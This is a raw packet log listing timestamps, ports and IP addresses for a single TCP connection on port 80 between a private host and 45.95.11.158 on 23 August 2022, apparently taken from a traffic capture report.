Aug 23, 2022 18:24:01.610661983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610703945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610707045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610743046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610745907 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610785007 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610856056 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610898018 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610902071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610935926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610939980 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.610975027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.610981941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.611027002 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.611027956 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.611064911 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.611072063 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.611108065 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.638756990 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.638808966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.638845921 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.638848066 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.638870001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.638887882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.638915062 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.638932943 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.638983011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.639022112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.639025927 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.639061928 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.639090061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.639131069 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.639622927 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.639718056 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.639724016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.639759064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.639761925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.639799118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.639802933 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.639842987 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.639944077 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.639986992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.639988899 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.640027046 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.640417099 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.640465975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.640485048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.640505075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.640522957 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.640544891 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.640547991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.640589952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.640805006 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.640846968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.640887022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.640914917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.640927076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.640958071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.641055107 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.641153097 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.641221046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.641232014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.641261101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.641271114 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.641304970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.641305923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.641350985 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.641422033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.641464949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.641472101 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.641542912 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.641554117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.641583920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.641590118 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.641629934 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.645075083 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.645132065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.645170927 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.645198107 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.645235062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.645294905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.645294905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.645349026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.645349979 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.645405054 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.645409107 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.645458937 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.645472050 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.645533085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.645545959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.645592928 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.645593882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.645642996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.645654917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.645687103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.645729065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.645736933 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.645744085 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.645770073 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.645782948 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.645823956 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.645876884 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.645920038 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.645931959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.645958900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.645968914 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.645998955 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646020889 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646039009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646047115 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646078110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646090984 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646120071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646156073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646158934 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646177053 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646198988 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646215916 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646240950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646250010 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646279097 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646289110 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646317959 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646323919 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646358013 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646365881 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646397114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646413088 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646435976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646441936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646476984 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646488905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646517992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646522999 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646559954 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646565914 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646599054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646616936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646639109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646644115 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646692991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646728039 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646769047 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646779060 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646819115 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646863937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646903038 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646914959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646941900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646949053 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.646982908 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.646989107 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.647027969 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.672372103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.672492981 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.672538042 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.672563076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.672586918 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.672595978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.672734976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.672761917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.672784090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.672789097 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.672805071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.672812939 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.672832012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.672853947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.673280001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.673335075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.673352957 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.673360109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.673382044 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.673383951 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.673418045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.673429012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.673484087 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.673525095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.673541069 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.673578024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.674103975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.674165964 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.674169064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.674196005 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.674212933 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.674220085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.674238920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.674259901 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.676347971 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.676378012 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.676402092 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.676423073 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.676425934 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.676460028 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.676465034 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.676469088 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.676736116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.676785946 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.676815033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.676863909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.676902056 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.676958084 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.677007914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.677045107 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.677056074 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.677086115 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.677128077 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.677160978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.677170992 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.677186012 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.677203894 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.677208900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.677227020 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.677249908 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.680459976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.680494070 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.680569887 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.680587053 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.680613041 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.680644035 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.680661917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.680710077 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.680795908 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.680865049 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.680896997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.680960894 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.680970907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.680994987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681024075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681041002 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681042910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681082010 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681106091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681108952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681159019 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681180954 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681184053 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681202888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681219101 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681230068 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681248903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681252003 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681263924 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681274891 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681277037 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681298971 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681319952 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681339025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681375027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681490898 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681514025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681535959 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681548119 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681559086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681581974 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681658030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681682110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681703091 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681716919 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681721926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681761026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681762934 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681786060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681802988 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681809902 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681833029 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681848049 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681921005 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.681965113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.681998968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.682035923 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.682039976 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.682075977 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.682112932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.682153940 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.682157040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.682192087 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.682197094 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.682212114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.682231903 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.682255030 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.682279110 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.682316065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.682320118 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.682344913 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.682360888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.682367086 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.682384014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.682404041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.682406902 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.682430983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.682446003 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.682454109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.682470083 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.682480097 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.682502985 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.682518959 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.682527065 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.682560921 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.706412077 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.706449986 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.706475973 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.706506968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.706547976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.706626892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.706684113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.706976891 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.707470894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.707498074 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.707518101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.707537889 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.707557917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.707667112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.707768917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.707791090 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.707829952 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.707851887 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.707927942 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.710170984 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.710230112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.710253000 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.710274935 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.710297108 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.710306883 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.710336924 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.710349083 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.710381031 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.710536957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.710563898 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.710586071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.710622072 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.710624933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.710649967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.710674047 CEST	49827	80	192.168.2.3	45.95.11.158
